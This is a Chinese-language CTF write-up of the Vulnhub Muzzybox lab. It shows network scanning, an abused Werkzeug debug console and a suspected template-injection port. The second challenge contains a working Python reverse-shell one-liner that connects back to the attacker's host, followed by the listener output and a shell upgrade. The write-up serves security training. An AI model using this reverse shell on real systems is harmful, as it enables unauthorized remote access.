Vulnhub之Muzzybox靶机详细测试过程
Muzzybox
识别目标主机IP地址
─(kali㉿kali)-[~/Desktop/Vulnhub/muzzybox]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:ff:33:41 1 60 PCS Systemtechnik GmbH
192.168.56.242 08:00:27:6c:2c:5b 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.242
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/muzzybox]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.242 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-03 22:06 EDT
Nmap scan report for bogon (192.168.56.242)
Host is up (0.00015s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e5:3c:05:11:e0:2a:5a:34:bf:95:4c:59:0e:86:81:4f (RSA)
| 256 a7:65:d3:5b:e7:9d:56:ad:e4:a9:87:d9:2d:ae:3a:c3 (ECDSA)
|_ 256 d5:7e:21:b6:3f:f3:24:7a:2f:b7:b6:6e:59:43:dd:73 (ED25519)
80/tcp open http SimpleHTTPServer 0.6 (Python 2.7.17)
|_http-title: Directory listing for /
3000/tcp open http Werkzeug httpd 1.0.0 (Python 3.6.9)
|_http-title: Muzzy CTF
|_http-server-header: Werkzeug/1.0.0 Python/3.6.9
8989/tcp open http Werkzeug httpd 1.0.0 (Python 3.6.9)
|_http-title: TypeError: The view function did not return a valid response. ...
|_http-server-header: Werkzeug/1.0.0 Python/3.6.9
9633/tcp open http SimpleHTTPServer 0.6 (Python 2.7.17)
|_http-title: Directory listing for /
15000/tcp open http Werkzeug httpd 1.0.0 (Python 3.6.9)
|_http-title: 404 Not Found
MAC Address: 08:00:27:6C:2C:5B (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.32 seconds
挑战一
访问80端口,访问该靶机的使用指南:
In addition, you can use this id card for reference. Click_Here OR got to http://{ip}:9633/idcard.png Note: Don't upload this file directly, edit with your name and upload it's screenshot.
将图片下载到Kali Linux本地
http://192.168.56.242:9633/idcard.png
然后需要修改图片,用画图工具修改,由于作者给的提示只有principal才是授权的,因此需要将student改成principal
然后在192.168.56.242:3000进行上传
挑战二
After the data breach University has developed the new website, but somehow it is still under maintenance. Can you able to list the current directory and read the flag file.
Link: http://{IP}:8989/
访问8989端口,却发现报错,不过在错误的右后方,可以点击,弹出窗口:
而这里的PIN就是挑战一的数字123456789,然后就出现了python的运行环境
首先在Kali Linux上启动nc侦听
然后在靶机的python console中执行:
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.230",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
这样在Kali Linux上得到了靶机返回的Shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/muzzybox]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.230] from (UNKNOWN) [192.168.56.242] 58360
192.168.56.230 - - [04/Apr/2023 08:06:18] "GET /?__debugger__=yes&cmd=os.dup2(s.fileno()%2C2)&frm=140383158195424&s=8ywYwr8xuss2AXZJi1Os HTTP/1.1" 200 -
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
webpy@muzzy:~$ ls -alh
ls -alh
total 32K
drwx------ 4 webpy webpy 4.0K Feb 25 2020 .
drwxr-xr-x 7 root root 4.0K Feb 25 2020 ..
-rwx------ 1 webpy webpy 381 Feb 25 2020 .bash_history
-rwx------ 1 webpy webpy 3.7K Feb 25 2020 .bashrc
drwx------ 2 webpy webpy 4.0K Feb 25 2020 flag
drwx------ 3 webpy webpy 4.0K Feb 25 2020 .local
-rwx------ 1 webpy webpy 807 Feb 25 2020 .profile
-rwx------ 1 webpy webpy 66 Feb 25 2020 .selected_editor
webpy@muzzy:~$ cd flag
cd flag
webpy@muzzy:~/flag$ ls -alh
ls -alh
total 12K
drwx------ 2 webpy webpy 4.0K Feb 25 2020 .
drwx------ 4 webpy webpy 4.0K Feb 25 2020 ..
-rwx------ 1 webpy webpy 490 Feb 25 2020 ctf2.py
webpy@muzzy:~/flag$ cat ctf2.py
cat ctf2.py
import os
from flask import Flask
app = Flask(__name__)
@app.route('/')
def aws_console():
print("Welcome to the Muzzy's World")
if __name__ == '__main__':
# os.environ['WERKZEUG_DEBUG_PIN'] = 'off'
# os.environ.set('WERKZEUG_DEBUG_PIN') = 'Muzzy'
# app.secret_key = '123-456-789'
os.environ['WERKZEUG_DEBUG_PIN'] = '123-456-789'
app.config['FLAG'] = 'N$cTF{R34D_F!L3_/home/webssti/noflag.txt}'
app.run(host='0.0.0.0', port=8989, debug=True, threaded=True)
这样就得到了第2个flag
N$cTF{R34D_F!L3_/home/webssti/noflag.txt}
挑战三
http://192.168.56.242:15000/page?name=jason
我们提交不同的name值时,页面返回相同值的内容,因此这个端口存在模板注入漏洞
可以利用tqlmap工具
STRIVE FOR PROGRESS,NOT FOR PERFECTION
浙公网安备 33010602011771号